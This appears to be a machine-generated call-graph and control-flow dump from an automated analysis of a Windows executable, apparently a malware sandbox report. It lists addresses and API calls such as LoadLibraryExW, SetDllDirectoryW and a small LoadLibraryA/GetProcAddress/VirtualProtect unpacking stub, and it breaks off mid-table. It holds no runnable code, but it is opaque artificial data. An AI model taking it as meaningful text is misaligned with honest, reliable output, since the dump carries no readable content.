7ff732068830 105788->105999 105790 7ff73206396a 106054 7ff732062710 54 API calls _log10_special 105790->106054 105791 7ff73206388e 105800 7ff7320638bb __std_exception_destroy 105791->105800 106030 7ff7320689a0 40 API calls __std_exception_destroy 105791->106030 105794 7ff73206395d 105795 7ff732063984 105794->105795 105796 7ff732063962 105794->105796 105797 7ff732061c80 49 API calls 105795->105797 106050 7ff73207004c 105796->106050 105801 7ff7320639a3 105797->105801 105802 7ff732068830 14 API calls 105800->105802 105811 7ff7320638de __std_exception_destroy 105800->105811 105801->105801 105805 7ff732061950 115 API calls 105801->105805 105802->105811 105804 7ff732063a0b 106057 7ff7320689a0 40 API calls __std_exception_destroy 105804->106057 105807 7ff7320639ce 105805->105807 105807->105788 105810 7ff7320639de 105807->105810 105808 7ff732063a17 106058 7ff7320689a0 40 API calls __std_exception_destroy 105808->106058 106055 7ff732062710 54 API calls _log10_special 105810->106055 105815 7ff73206390e __std_exception_destroy 105811->105815 106056 7ff732068940 40 API calls __std_exception_destroy 105811->106056 105812 7ff732063a23 106059 7ff7320689a0 40 API calls __std_exception_destroy 105812->106059 105816 7ff732068830 14 API calls 105815->105816 105817 7ff732063a3b 105816->105817 105818 7ff732063b2f 105817->105818 105819 7ff732063a60 __std_exception_destroy 105817->105819 106061 7ff732062710 54 API calls _log10_special 105818->106061 105827 7ff732063aab 105819->105827 106060 7ff732068940 40 API calls __std_exception_destroy 105819->106060 105821 7ff732063808 __std_exception_destroy 105821->105780 105823 7ff732068830 14 API calls 105824 7ff732063bf4 __std_exception_destroy 105823->105824 105825 7ff732063c46 105824->105825 105826 7ff732063d41 105824->105826 105828 7ff732063cd4 105825->105828 105829 7ff732063c50 105825->105829 106066 7ff7320644e0 49 API calls 105826->106066 105827->105823 105831 7ff732068830 14 API calls 105828->105831 106062 7ff7320690e0 59 API calls _log10_special 105829->106062 105837 7ff732063ce0 105831->105837 105833 7ff732063d4f 105835 7ff732063d65 105833->105835 105836 7ff732063d71 105833->105836 105834 7ff732063c55 105840 7ff732063c61 105834->105840 105841 7ff732063cb3 105834->105841 106067 7ff732064630 105835->106067 105839 7ff732061c80 49 API calls 105836->105839 105837->105840 105842 7ff732063ced 105837->105842 105852 7ff732063d2b __std_exception_destroy 105839->105852 106063 7ff732062710 54 API calls _log10_special 105840->106063 106064 7ff732068660 86 API calls 2 library calls 105841->106064 105844 7ff732061c80 49 API calls 105842->105844 105848 7ff732063d0b 105844->105848 105846 7ff732063dc4 106012 7ff732069390 105846->106012 105847 7ff732063cbb 105850 7ff732063cc8 105847->105850 105851 7ff732063cbf 105847->105851 105848->105852 105853 7ff732063d12 105848->105853 105850->105852 105851->105840 105852->105846 105854 7ff732063da7 SetDllDirectoryW LoadLibraryExW 105852->105854 106065 7ff732062710 54 API calls _log10_special 105853->106065 105854->105846 105855 7ff732063dd7 SetDllDirectoryW 105858 7ff732063e0a 105855->105858 105900 7ff732063e5a 105855->105900 105860 7ff732068830 14 API calls 105858->105860 105859 7ff732064008 105862 7ff732064035 105859->105862 105863 7ff732064012 PostMessageW GetMessageW 105859->105863 105867 7ff732063e16 __std_exception_destroy 105860->105867 105861 7ff732063f1b 106078 7ff7320633c0 121 API calls 2 library calls 105861->106078 106017 7ff732063360 105862->106017 105863->105862 105865 7ff732063f23 105865->105821 105868 7ff732063f2b 105865->105868 105870 7ff732063ef2 105867->105870 105874 7ff732063e4e 105867->105874 106079 7ff7320690c0 LocalFree 105868->106079 106077 7ff732068940 40 API calls __std_exception_destroy 105870->106077 105874->105900 106070 7ff732066dc0 54 API calls _set_fmode 105874->106070 105878 7ff73206404f 106081 7ff732066fc0 FreeLibrary 105878->106081 105882 7ff73206405b 105885 7ff732063e6c 106071 7ff732067340 117 API calls 2 library calls 105885->106071 105888 7ff732063e81 105891 7ff732063ea2 105888->105891 105904 7ff732063e85 105888->105904 106072 7ff732066e00 120 API calls _log10_special 105888->106072 105891->105904 106073 7ff7320671b0 125 API calls 105891->106073 105895 7ff732063ee0 106076 7ff732066fc0 FreeLibrary 105895->106076 105896 7ff732063eb7 105896->105904 106074 7ff7320674f0 55 API calls 105896->106074 105900->105859 105900->105861 105904->105900 106075 7ff732062a50 54 API calls _log10_special 105904->106075 105912->105754 105913->105762 105914->105763 105915->105749 105916->105752 105917->105767 105919 7ff73206d28b GetStartupInfoW 105918->105919 105919->105756 105923 7ff73207f480 105920->105923 105921 7ff73207f4d3 106082 7ff73207a814 37 API calls 2 library calls 105921->106082 105923->105921 105924 7ff73207f526 105923->105924 106083 7ff73207f358 71 API calls _fread_nolock 105924->106083 105926 7ff73207f4fc 105926->105776 106084 7ff73206c850 105927->106084 105930 7ff7320636eb GetLastError 106091 7ff732062c50 51 API calls _log10_special 105930->106091 105931 7ff732063710 106086 7ff732069280 FindFirstFileExW 105931->106086 105935 7ff73206377d 106094 7ff732069440 WideCharToMultiByte WideCharToMultiByte __std_exception_destroy 105935->106094 105936 7ff732063723 106092 7ff732069300 CreateFileW GetFinalPathNameByHandleW CloseHandle 105936->106092 105938 7ff73206c550 _log10_special 8 API calls 105940 7ff7320637b5 105938->105940 105940->105821 105949 7ff732061950 105940->105949 105941 7ff732063730 105944 7ff73206374c __vcrt_FlsAlloc 105941->105944 105945 7ff732063734 105941->105945 105942 7ff732063706 105942->105938 105943 7ff73206378b 105943->105942 106095 7ff732062810 49 API calls _log10_special 105943->106095 105944->105935 106093 7ff732062810 49 API calls _log10_special 105945->106093 105948 7ff732063745 105948->105942 105950 7ff7320645c0 108 API calls 105949->105950 105951 7ff732061985 105950->105951 105952 7ff732061c43 105951->105952 105954 7ff732067f90 83 API calls 105951->105954 105953 7ff73206c550 _log10_special 8 API calls 105952->105953 105955 7ff732061c5e 105953->105955 105956 7ff7320619cb 105954->105956 105955->105783 105955->105784 105998 7ff732061a03 105956->105998 106096 7ff7320706d4 105956->106096 105957 7ff73207004c 74 API calls 105957->105952 105959 7ff7320619e5 105960 7ff732061a08 105959->105960 105961 7ff7320619e9 105959->105961 106100 7ff73207039c 105960->106100 106103 7ff732074f08 11 API calls _set_fmode 105961->106103 105964 7ff7320619ee 106104 7ff732062910 54 API calls _log10_special 105964->106104 105967 7ff732061a26 106105 7ff732074f08 11 API calls _set_fmode 105967->106105 105968 7ff732061a45 105971 7ff732061a5c 105968->105971 105972 7ff732061a7b 105968->105972 105970 7ff732061a2b 106106 7ff732062910 54 API calls _log10_special 105970->106106 106107 7ff732074f08 11 API calls _set_fmode 105971->106107 105975 7ff732061c80 49 API calls 105972->105975 105977 7ff732061a92 105975->105977 105976 7ff732061a61 106108 7ff732062910 54 API calls _log10_special 105976->106108 105979 7ff732061c80 49 API calls 105977->105979 105980 7ff732061add 105979->105980 105981 7ff7320706d4 73 API calls 105980->105981 105982 7ff732061b01 105981->105982 105983 7ff732061b16 105982->105983 105984 7ff732061b35 105982->105984 106109 7ff732074f08 11 API calls _set_fmode 105983->106109 105986 7ff73207039c _fread_nolock 53 API calls 105984->105986 105988 7ff732061b4a 105986->105988 105987 7ff732061b1b 106110 7ff732062910 54 API calls _log10_special 105987->106110 105990 7ff732061b50 105988->105990 105991 7ff732061b6f 105988->105991 106111 7ff732074f08 11 API calls _set_fmode 105990->106111 106113 7ff732070110 37 API calls 2 library calls 105991->106113 105994 7ff732061b55 106112 7ff732062910 54 API calls _log10_special 105994->106112 105995 7ff732061b89 105995->105998 106114 7ff732062710 54 API calls _log10_special 105995->106114 105998->105957 106000 7ff73206883a 105999->106000 106001 7ff732069390 2 API calls 106000->106001 106002 7ff732068859 GetEnvironmentVariableW 106001->106002 106003 7ff732068876 ExpandEnvironmentStringsW 106002->106003 106004 7ff7320688c2 106002->106004 106003->106004 106006 7ff732068898 106003->106006 106005 7ff73206c550 _log10_special 8 API calls 106004->106005 106008 7ff7320688d4 106005->106008 106144 7ff732069440 WideCharToMultiByte WideCharToMultiByte __std_exception_destroy 106006->106144 106008->105791 106009 7ff7320688aa 106010 7ff73206c550 _log10_special 8 API calls 106009->106010 106011 7ff7320688ba 106010->106011 106011->105791 106013 7ff7320693b2 MultiByteToWideChar 106012->106013 106014 7ff7320693d6 106012->106014 106013->106014 106016 7ff7320693ec __std_exception_destroy 106013->106016 106015 7ff7320693f3 MultiByteToWideChar 106014->106015 106014->106016 106015->106016 106016->105855 106145 7ff732066360 106017->106145 106021 7ff732063381 106025 7ff732063399 106021->106025 106213 7ff732066050 106021->106213 106023 7ff73206338d 106023->106025 106222 7ff7320661e0 54 API calls 106023->106222 106080 7ff732063670 FreeLibrary 106025->106080 106027 7ff732061ca5 106026->106027 106361 7ff732074984 106027->106361 106030->105800 106032 7ff7320645cc 106031->106032 106033 7ff732069390 2 API calls 106032->106033 106034 7ff7320645f4 106033->106034 106035 7ff732069390 2 API calls 106034->106035 106036 7ff732064607 106035->106036 106388 7ff732075f94 106036->106388 106039 7ff73206c550 _log10_special 8 API calls 106040 7ff73206392b 106039->106040 106040->105790 106041 7ff732067f90 106040->106041 106042 7ff732067fb4 106041->106042 106043 7ff7320706d4 73 API calls 106042->106043 106048 7ff73206808b __std_exception_destroy 106042->106048 106044 7ff732067fd0 106043->106044 106044->106048 106554 7ff7320778c8 106044->106554 106046 7ff7320706d4 73 API calls 106049 7ff732067fe5 106046->106049 106047 7ff73207039c _fread_nolock 53 API calls 106047->106049 106048->105794 106049->106046 106049->106047 106049->106048 106051 7ff73207007c 106050->106051 106570 7ff73206fe28 106051->106570 106053 7ff732070095 106053->105790 106054->105821 106055->105821 106056->105804 106057->105808 106058->105812 106059->105815 106060->105827 106061->105821 106062->105834 106063->105821 106064->105847 106065->105821 106066->105833 106068 7ff732061c80 49 API calls 106067->106068 106069 7ff732064660 106068->106069 106069->105852 106070->105885 106071->105888 106072->105891 106073->105896 106074->105904 106075->105895 106076->105900 106077->105900 106078->105865 106080->105878 106081->105882 106082->105926 106083->105926 106085 7ff7320636bc GetModuleFileNameW 106084->106085 106085->105930 106085->105931 106087 7ff7320692d2 106086->106087 106088 7ff7320692bf FindClose 106086->106088 106089 7ff73206c550 _log10_special 8 API calls 106087->106089 106088->106087 106090 7ff73206371a 106089->106090 106090->105935 106090->105936 106091->105942 106092->105941 106093->105948 106094->105943 106095->105942 106097 7ff732070704 106096->106097 106115 7ff732070464 106097->106115 106099 7ff73207071d 106099->105959 106128 7ff7320703bc 106100->106128 106103->105964 106104->105998 106105->105970 106106->105998 106107->105976 106108->105998 106109->105987 106110->105998 106111->105994 106112->105998 106113->105995 106114->105998 106116 7ff7320704ce 106115->106116 106117 7ff73207048e 106115->106117 106116->106117 106119 7ff7320704da 106116->106119 106127 7ff73207a814 37 API calls 2 library calls 106117->106127 106126 7ff73207546c EnterCriticalSection 106119->106126 106120 7ff7320704b5 106120->106099 106122 7ff7320704df 106123 7ff7320705e8 71 API calls 106122->106123 106124 7ff7320704f1 106123->106124 106125 7ff732075478 _fread_nolock LeaveCriticalSection 106124->106125 106125->106120 106127->106120 106129 7ff732061a20 106128->106129 106130 7ff7320703e6 106128->106130 106129->105967 106129->105968 106130->106129 106131 7ff7320703f5 memcpy_s 106130->106131 106132 7ff732070432 106130->106132 106142 7ff732074f08 11 API calls _set_fmode 106131->106142 106141 7ff73207546c EnterCriticalSection 106132->106141 106134 7ff73207043a 106136 7ff73207013c _fread_nolock 51 API calls 106134->106136 106139 7ff732070451 106136->106139 106137 7ff73207040a 106143 7ff73207a8e0 37 API calls _invalid_parameter_noinfo 106137->106143 106140 7ff732075478 _fread_nolock LeaveCriticalSection 106139->106140 106140->106129 106142->106137 106143->106129 106144->106009 106146 7ff732066375 106145->106146 106147 7ff732061c80 49 API calls 106146->106147 106148 7ff7320663b1 106147->106148 106149 7ff7320663dd 106148->106149 106150 7ff7320663ba 106148->106150 106152 7ff732064630 49 API calls 106149->106152 106233 7ff732062710 54 API calls _log10_special 106150->106233 106153 7ff7320663f5 106152->106153 106154 7ff732066413 106153->106154 106234 7ff732062710 54 API calls _log10_special 106153->106234 106223 7ff732064560 106154->106223 106157 7ff73206c550 _log10_special 8 API calls 106159 7ff73206336e 106157->106159 106159->106025 106176 7ff732066500 106159->106176 106160 7ff73206642b 106162 7ff732064630 49 API calls 106160->106162 106163 7ff732066444 106162->106163 106164 7ff732066469 106163->106164 106165 7ff732066449 106163->106165 106167 7ff732068e80 3 API calls 106164->106167 106235 7ff732062710 54 API calls _log10_special 106165->106235 106169 7ff732066476 106167->106169 106168 7ff7320663d3 106168->106157 106170 7ff732066482 106169->106170 106171 7ff7320664c1 106169->106171 106172 7ff732069390 2 API calls 106170->106172 106237 7ff732065830 137 API calls 106171->106237 106174 7ff73206649a GetLastError 106172->106174 106236 7ff732062c50 51 API calls _log10_special 106174->106236 106238 7ff732065400 106176->106238 106178 7ff732066526 106179 7ff73206652e 106178->106179 106180 7ff73206653f 106178->106180 106263 7ff732062710 54 API calls _log10_special 106179->106263 106245 7ff732064c90 106180->106245 106184 7ff73206655c 106188 7ff73206656c 106184->106188 106190 7ff73206657d 106184->106190 106185 7ff73206654b 106264 7ff732062710 54 API calls _log10_special 106185->106264 106187 7ff73206653a 106187->106021 106265 7ff732062710 54 API calls _log10_special 106188->106265 106191 7ff73206659c 106190->106191 106192 7ff7320665ad 106190->106192 106266 7ff732062710 54 API calls _log10_special 106191->106266 106194 7ff7320665bc 106192->106194 106195 7ff7320665cd 106192->106195 106267 7ff732062710 54 API calls _log10_special 106194->106267 106249 7ff732064d50 106195->106249 106199 7ff7320665dc 106268 7ff732062710 54 API calls _log10_special 106199->106268 106200 7ff7320665ed 106202 7ff7320665fc 106200->106202 106203 7ff73206660d 106200->106203 106269 7ff732062710 54 API calls _log10_special 106202->106269 106205 7ff73206661f 106203->106205 106207 7ff732066630 106203->106207 106270 7ff732062710 54 API calls _log10_special 106205->106270 106210 7ff73206665a 106207->106210 106271 7ff7320772b0 73 API calls 106207->106271 106209 7ff732066648 106272 7ff7320772b0 73 API calls 106209->106272 106210->106187 106273 7ff732062710 54 API calls _log10_special 106210->106273 106214 7ff732066070 106213->106214 106214->106214 106215 7ff732066099 106214->106215 106221 7ff7320660b0 __std_exception_destroy 106214->106221 106305 7ff732062710 54 API calls _log10_special 106215->106305 106217 7ff7320660a5 106217->106023 106218 7ff7320661bb 106218->106023 106220 7ff732062710 54 API calls 106220->106221 106221->106218 106221->106220 106275 7ff732061470 106221->106275 106222->106025 106224 7ff73206456a 106223->106224 106225 7ff732069390 2 API calls 106224->106225 106226 7ff73206458f 106225->106226 106227 7ff73206c550 _log10_special 8 API calls 106226->106227 106228 7ff7320645b7 106227->106228 106228->106160 106229 7ff732068e80 106228->106229 106230 7ff732069390 2 API calls 106229->106230 106231 7ff732068e94 LoadLibraryExW 106230->106231 106232 7ff732068eb3 __std_exception_destroy 106231->106232 106232->106160 106233->106168 106234->106154 106235->106168 106236->106168 106237->106168 106240 7ff73206542c 106238->106240 106239 7ff732065434 106239->106178 106240->106239 106243 7ff7320655d4 106240->106243 106274 7ff732076aa4 48 API calls 106240->106274 106241 7ff732065797 __std_exception_destroy 106241->106178 106242 7ff7320647d0 47 API calls 106242->106243 106243->106241 106243->106242 106246 7ff732064cc0 106245->106246 106247 7ff73206c550 _log10_special 8 API calls 106246->106247 106248 7ff732064d2a 106247->106248 106248->106184 106248->106185 106250 7ff732064d65 106249->106250 106251 7ff732061c80 49 API calls 106250->106251 106252 7ff732064db1 106251->106252 106253 7ff732061c80 49 API calls 106252->106253 106262 7ff732064e33 __std_exception_destroy 106252->106262 106254 7ff732064df0 106253->106254 106257 7ff732069390 2 API calls 106254->106257 106254->106262 106255 7ff73206c550 _log10_special 8 API calls 106256 7ff732064e7e 106255->106256 106256->106199 106256->106200 106258 7ff732064e06 106257->106258 106259 7ff732069390 2 API calls 106258->106259 106260 7ff732064e1d 106259->106260 106261 7ff732069390 2 API calls 106260->106261 106261->106262 106262->106255 106263->106187 106264->106187 106265->106187 106266->106187 106267->106187 106268->106187 106269->106187 106270->106187 106271->106209 106272->106210 106273->106187 106274->106240 106276 7ff7320645c0 108 API calls 106275->106276 106277 7ff732061493 106276->106277 106278 7ff7320614bc 106277->106278 106279 7ff73206149b 106277->106279 106281 7ff7320706d4 73 API calls 106278->106281 106328 7ff732062710 54 API calls _log10_special 106279->106328 106283 7ff7320614d1 106281->106283 106282 7ff7320614ab 106282->106221 106284 7ff7320614f8 106283->106284 106285 7ff7320614d5 106283->106285 106288 7ff732061508 106284->106288 106289 7ff732061532 106284->106289 106329 7ff732074f08 11 API calls _set_fmode 106285->106329 106287 7ff7320614da 106330 7ff732062910 54 API calls _log10_special 106287->106330 106331 7ff732074f08 11 API calls _set_fmode 106288->106331 106292 7ff732061538 106289->106292 106300 7ff73206154b 106289->106300 106306 7ff732061210 106292->106306 106293 7ff732061510 106332 7ff732062910 54 API calls _log10_special 106293->106332 106296 7ff73207004c 74 API calls 106298 7ff7320615c4 106296->106298 106297 7ff7320614f3 __std_exception_destroy 106297->106296 106298->106221 106299 7ff73207039c _fread_nolock 53 API calls 106299->106300 106300->106297 106300->106299 106301 7ff7320615d6 106300->106301 106333 7ff732074f08 11 API calls _set_fmode 106301->106333 106303 7ff7320615db 106334 7ff732062910 54 API calls _log10_special 106303->106334 106305->106217 106307 7ff732061268 106306->106307 106308 7ff732061297 106307->106308 106309 7ff73206126f 106307->106309 106312 7ff7320612d4 106308->106312 106313 7ff7320612b1 106308->106313 106339 7ff732062710 54 API calls _log10_special 106309->106339 106311 7ff732061282 106311->106297 106316 7ff7320612e6 106312->106316 106326 7ff732061309 memcpy_s 106312->106326 106340 7ff732074f08 11 API calls _set_fmode 106313->106340 106315 7ff7320612b6 106341 7ff732062910 54 API calls _log10_special 106315->106341 106342 7ff732074f08 11 API calls _set_fmode 106316->106342 106319 7ff7320612eb 106343 7ff732062910 54 API calls _log10_special 106319->106343 106320 7ff73207039c _fread_nolock 53 API calls 106320->106326 106322 7ff7320612cf __std_exception_destroy 106322->106297 106323 7ff7320613cf 106344 7ff732062710 54 API calls _log10_special 106323->106344 106326->106320 106326->106322 106326->106323 106327 7ff732070110 37 API calls 106326->106327 106335 7ff732070adc 106326->106335 106327->106326 106328->106282 106329->106287 106330->106297 106331->106293 106332->106297 106333->106303 106334->106297 106336 7ff732070b0c 106335->106336 106345 7ff73207082c 106336->106345 106338 7ff732070b2a 106338->106326 106339->106311 106340->106315 106341->106322 106342->106319 106343->106322 106344->106322 106346 7ff73207084c 106345->106346 106351 7ff732070879 106345->106351 106347 7ff732070856 106346->106347 106348 7ff732070881 106346->106348 106346->106351 106359 7ff73207a814 37 API calls 2 library calls 106347->106359 106352 7ff73207076c 106348->106352 106351->106338 106360 7ff73207546c EnterCriticalSection 106352->106360 106354 7ff732070789 106355 7ff7320707ac 74 API calls 106354->106355 106356 7ff732070792 106355->106356 106357 7ff732075478 _fread_nolock LeaveCriticalSection 106356->106357 106358 7ff73207079d 106357->106358 106358->106351 106359->106351 106362 7ff7320749de 106361->106362 106363 7ff732074a03 106362->106363 106365 7ff732074a3f 106362->106365 106379 7ff73207a814 37 API calls 2 library calls 106363->106379 106380 7ff732072c10 49 API calls _invalid_parameter_noinfo 106365->106380 106367 7ff732074a2d 106369 7ff73206c550 _log10_special 8 API calls 106367->106369 106368 7ff732074b1c 106370 7ff73207a948 __free_lconv_mon 11 API calls 106368->106370 106371 7ff732061cc8 106369->106371 106370->106367 106371->105788 106372 7ff732074ad6 106372->106368 106373 7ff732074af1 106372->106373 106374 7ff732074b40 106372->106374 106377 7ff732074ae8 106372->106377 106381 7ff73207a948 106373->106381 106374->106368 106375 7ff732074b4a 106374->106375 106378 7ff73207a948 __free_lconv_mon 11 API calls 106375->106378 106377->106368 106377->106373 106378->106367 106379->106367 106380->106372 106382 7ff73207a94d HeapFree 106381->106382 106383 7ff73207a97c 106381->106383 106382->106383 106384 7ff73207a968 GetLastError 106382->106384 106383->106367 106385 7ff73207a975 __free_lconv_mon 106384->106385 106387 7ff732074f08 11 API calls _set_fmode 106385->106387 106387->106383 106389 7ff732075ec8 106388->106389 106390 7ff732075eee 106389->106390 106392 7ff732075f21 106389->106392 106419 7ff732074f08 11 API calls _set_fmode 106390->106419 106394 7ff732075f27 106392->106394 106395 7ff732075f34 106392->106395 106393 7ff732075ef3 106420 7ff73207a8e0 37 API calls _invalid_parameter_noinfo 106393->106420 106421 7ff732074f08 11 API calls _set_fmode 106394->106421 106407 7ff73207ac28 106395->106407 106399 7ff732064616 106399->106039 106401 7ff732075f48 106422 7ff732074f08 11 API calls _set_fmode 106401->106422 106402 7ff732075f55 106414 7ff73207fecc 106402->106414 106405 7ff732075f68 106423 7ff732075478 LeaveCriticalSection 106405->106423 106424 7ff7320802d8 EnterCriticalSection 106407->106424 106409 7ff73207ac3f 106410 7ff73207ac9c 19 API calls 106409->106410 106411 7ff73207ac4a 106410->106411 106412 7ff732080338 _isindst LeaveCriticalSection 106411->106412 106413 7ff732075f3e 106412->106413 106413->106401 106413->106402 106425 7ff73207fbc8 106414->106425 106417 7ff73207ff26 106417->106405 106419->106393 106420->106399 106421->106399 106422->106399 106430 7ff73207fc03 __vcrt_FlsAlloc 106425->106430 106427 7ff73207fea1 106444 7ff73207a8e0 37 API calls _invalid_parameter_noinfo 106427->106444 106429 7ff73207fdd3 106429->106417 106437 7ff732086d54 106429->106437 106430->106430 106435 7ff73207fdca 106430->106435 106440 7ff732077a3c 51 API calls 3 library calls 106430->106440 106432 7ff73207fe35 106432->106435 106441 7ff732077a3c 51 API calls 3 library calls 106432->106441 106434 7ff73207fe54 106434->106435 106442 7ff732077a3c 51 API calls 3 library calls 106434->106442 106435->106429 106443 7ff732074f08 11 API calls _set_fmode 106435->106443 106445 7ff732086354 106437->106445 106440->106432 106441->106434 106442->106435 106443->106427 106444->106429 106446 7ff73208636b 106445->106446 106448 7ff732086389 106445->106448 106499 7ff732074f08 11 API calls _set_fmode 106446->106499 106448->106446 106450 7ff7320863a5 106448->106450 106449 7ff732086370 106500 7ff73207a8e0 37 API calls _invalid_parameter_noinfo 106449->106500 106456 7ff732086964 106450->106456 106454 7ff73208637c 106454->106417 106502 7ff732086698 106456->106502 106459 7ff7320869d9 106533 7ff732074ee8 11 API calls _set_fmode 106459->106533 106460 7ff7320869f1 106521 7ff732078520 106460->106521 106463 7ff7320869de 106534 7ff732074f08 11 API calls _set_fmode 106463->106534 106491 7ff7320863d0 106491->106454 106501 7ff7320784f8 LeaveCriticalSection 106491->106501 106499->106449 106500->106454 106503 7ff7320866c4 106502->106503 106504 7ff7320866de 106502->106504 106503->106504 106546 7ff732074f08 11 API calls _set_fmode 106503->106546 106520 7ff73208675c 106504->106520 106548 7ff732074f08 11 API calls _set_fmode 106504->106548 106506 7ff7320866d3 106547 7ff73207a8e0 37 API calls _invalid_parameter_noinfo 106506->106547 106508 7ff7320867ad 106516 7ff73208680a 106508->106516 106552 7ff732079b78 37 API calls 2 library calls 106508->106552 106511 7ff732086806 106511->106516 106517 7ff73207a900 _isindst 17 API calls 106511->106517 106513 7ff7320867a2 106551 7ff73207a8e0 37 API calls _invalid_parameter_noinfo 106513->106551 106514 7ff732086751 106549 7ff73207a8e0 37 API calls _invalid_parameter_noinfo 106514->106549 106516->106459 106516->106460 106519 7ff73208689d 106517->106519 106520->106508 106550 7ff732074f08 11 API calls _set_fmode 106520->106550 106553 7ff7320802d8 EnterCriticalSection 106521->106553 106533->106463 106534->106491 106546->106506 106547->106504 106548->106514 106549->106520 106550->106513 106551->106508 106552->106511 106555 7ff7320778f8 106554->106555 106558 7ff7320773d4 106555->106558 106557 7ff732077911 106557->106049 106559 7ff73207741e 106558->106559 106560 7ff7320773ef 106558->106560 106568 7ff73207546c EnterCriticalSection 106559->106568 106569 7ff73207a814 37 API calls 2 library calls 106560->106569 106563 7ff732077423 106564 7ff732077440 38 API calls 106563->106564 106565 7ff73207742f 106564->106565 106566 7ff732075478 _fread_nolock LeaveCriticalSection 106565->106566 106567 7ff73207740f 106566->106567 106567->106557 106569->106567 106571 7ff73206fe43 106570->106571 106572 7ff73206fe71 106570->106572 106581 7ff73207a814 37 API calls 2 library calls 106571->106581 106579 7ff73206fe63 106572->106579 106580 7ff73207546c EnterCriticalSection 106572->106580 106575 7ff73206fe88 106576 7ff73206fea4 72 API calls 106575->106576 106577 7ff73206fe94 106576->106577 106578 7ff732075478 _fread_nolock LeaveCriticalSection 106577->106578 106578->106579 106579->106053 106581->106579 106582 7ffdfb2a9060 106587 7ffdfb2a9c01 106582->106587 106590 7ffdfb2a9078 106582->106590 106583 7ffdfb2a9b0e LoadLibraryA 106584 7ffdfb2a9b28 106583->106584 106588 7ffdfb2a9b47 GetProcAddress 106584->106588 106584->106590 106586 7ffdfb2a9b69 VirtualProtect VirtualProtect 106586->106587 106587->106587 106588->106584 106589 7ffdfb2a9b5e 106588->106589 106590->106583 106590->106586 106600 7ffdfad90350 106601 7ffdfad90f30 106600->106601 106604 7ffdfad90368 106600->106604 106602 7ffdfad90e53 LoadLibraryA 106603 7ffdfad90e6d 106602->106603 106603->106604 106606 7ffdfad90e76 GetProcAddress 106603->106606 106604->106602 106607 7ffdfad90ea2 VirtualProtect VirtualProtect 106604->106607 106606->106603 106608 7ffdfad90e97 106606->106608 106607->106601 106609 7ff732062fe0 106610 7ff732062ff0 106609->106610 106611 7ff73206302b 106610->106611 106612 7ff732063041 106610->106612 106637 7ff732062710 54 API calls _log10_special 106611->106637 106614 7ff732063061 106612->106614 106624 7ff732063077 __std_exception_destroy 106612->106624 106638 7ff732062710 54 API calls _log10_special 106614->106638 106616 7ff73206c550 _log10_special 8 API calls 106617 7ff7320631fa 106616->106617 106618 7ff732061470 116 API calls 106618->106624 106619 7ff732063349 106645 7ff732062710 54 API calls _log10_special 106619->106645 106620 7ff732061c80 49 API calls 106620->106624 106622 7ff732063333 106644 7ff732062710 54 API calls _log10_special 106622->106644 106624->106618 106624->106619 106624->106620 106624->106622 106625 7ff73206330d 106624->106625 106627 7ff732063207 106624->106627 106636 7ff732063037 __std_exception_destroy 106624->106636 106643 7ff732062710 54 API calls _log10_special 106625->106643 106628 7ff732063273 106627->106628 106639 7ff73207a404 37 API calls 2 library calls 106627->106639 106630 7ff73206329e 106628->106630 106631 7ff732063290 106628->106631 106641 7ff732062dd0 37 API calls 106630->106641 106640 7ff73207a404 37 API calls 2 library calls 106631->106640 106634 7ff73206329c 106642 7ff732062500 54 API calls __std_exception_destroy 106634->106642 106636->106616 106637->106636 106638->106636 106639->106628 106640->106634 106641->106634 106642->106636 106643->106636 106644->106636 106645->106636

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 0 7ff732061000-7ff732063806 call 7ff73206fe18 call 7ff73206fe20 call 7ff73206c850 call 7ff7320753f0 call 7ff732075484 call 7ff7320636b0 14 7ff732063808-7ff73206380f 0->14 15 7ff732063814-7ff732063836 call 7ff732061950 0->15 17 7ff732063c97-7ff732063cb2 call 7ff73206c550 14->17 21 7ff73206383c-7ff732063856 call 7ff732061c80 15->21 22 7ff73206391b-7ff732063931 call 7ff7320645c0 15->22 26 7ff73206385b-7ff73206389b call 7ff732068830 21->26 28 7ff73206396a-7ff73206397f call 7ff732062710 22->28 29 7ff732063933-7ff732063960 call 7ff732067f90 22->29 33 7ff73206389d-7ff7320638a3 26->33 34 7ff7320638c1-7ff7320638cc call 7ff732074f30 26->34 42 7ff732063c8f 28->42 40 7ff732063984-7ff7320639a6 call 7ff732061c80 29->40 41 7ff732063962-7ff732063965 call 7ff73207004c 29->41 37 7ff7320638a5-7ff7320638ad 33->37 38 7ff7320638af-7ff7320638bd call 7ff7320689a0 33->38 49 7ff7320639fc-7ff732063a2a call 7ff732068940 call 7ff7320689a0 * 3 34->49 50 7ff7320638d2-7ff7320638e1 call 7ff732068830 34->50 37->38 38->34 51 7ff7320639b0-7ff7320639b9 40->51 41->28 42->17 75 7ff732063a2f-7ff732063a3e call 7ff732068830 49->75 58 7ff7320638e7-7ff7320638ed 50->58 59 7ff7320639f4-7ff7320639f7 call 7ff732074f30 50->59 51->51 54 7ff7320639bb-7ff7320639d8 call 7ff732061950 51->54 54->26 66 7ff7320639de-7ff7320639ef call 7ff732062710 54->66 64 7ff7320638f0-7ff7320638fc 58->64 59->49 67 7ff7320638fe-7ff732063903 64->67 68 7ff732063905-7ff732063908 64->68 66->42 67->64 67->68 68->59 70 7ff73206390e-7ff732063916 call 7ff732074f30 68->70 70->75 79 7ff732063a44-7ff732063a47 75->79 80 7ff732063b45-7ff732063b53 75->80 79->80 83 7ff732063a4d-7ff732063a50 79->83 81 7ff732063a67 80->81 82 7ff732063b59-7ff732063b5d 80->82 84 7ff732063a6b-7ff732063a90 call 7ff732074f30 81->84 82->84 85 7ff732063b14-7ff732063b17 83->85 86 7ff732063a56-7ff732063a5a 83->86 95 7ff732063aab-7ff732063ac0 84->95 96 7ff732063a92-7ff732063aa6 call 7ff732068940 84->96 88 7ff732063b19-7ff732063b1d 85->88 89 7ff732063b2f-7ff732063b40 call 7ff732062710 85->89 86->85 87 7ff732063a60 86->87 87->81 88->89 91 7ff732063b1f-7ff732063b2a 88->91 99 7ff732063c7f-7ff732063c87 89->99 91->84 97 7ff732063be8-7ff732063bfa call 7ff732068830 95->97 98 7ff732063ac6-7ff732063aca 95->98 96->95 107 7ff732063bfc-7ff732063c02 97->107 108 7ff732063c2e 97->108 102 7ff732063bcd-7ff732063be2 call 7ff732061940 98->102 103 7ff732063ad0-7ff732063ae8 call 7ff732075250 98->103 99->42 102->97 102->98 111 7ff732063aea-7ff732063b02 call 7ff732075250 103->111 112 7ff732063b62-7ff732063b7a call 7ff732075250 